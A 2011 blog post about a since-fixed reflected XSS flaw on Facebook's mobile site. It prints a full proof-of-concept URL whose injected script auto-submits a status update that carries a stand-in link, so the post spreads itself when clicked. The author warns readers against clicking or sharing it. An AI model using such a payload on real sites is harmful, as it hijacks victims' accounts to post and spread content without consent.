Tuesday, March 29, 2011

New XSS at m.facebook.com

So,noticed that there's a new XSS vulnerability found at facebook by someone.
Figured out after saw my friend update his facebook status in Indonesian language.


so,the what the attacker can do is when a victim click the link,the victim will automatically update his/her facebook status via..facebook own apps!!
u can see the status is updated via Share from the screenshot.

POC of XSS


so,how the attacker do to make the victim will update their status just by clicking the link??

http://m.facebook.com/path/blalallaa.php?display=wap&user_xxxx_xxxx='%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value='Update Status!!!%20http://fakelink.cc/something';document.forms[0].submit();}%3C/script%3E

p/s
- if u want to click the link without updating your facebook,logout first :D
- make the shorten url become the real url first
- still,never click.maybe some attacker can use a dangerous script for something bad attempt
- just remove the status update before your friend click it.pls dont share for fun.it can be something that dangerous for your facebook account if the attacker want to.

edited :
- facebook team already fixed this vuln.
- my friend also blogged about this. here
disclaimer : i'm not the one found this vuln at first.kudos to the real founder.
Share:

1 comments:

Anonymous said...

nice post! =)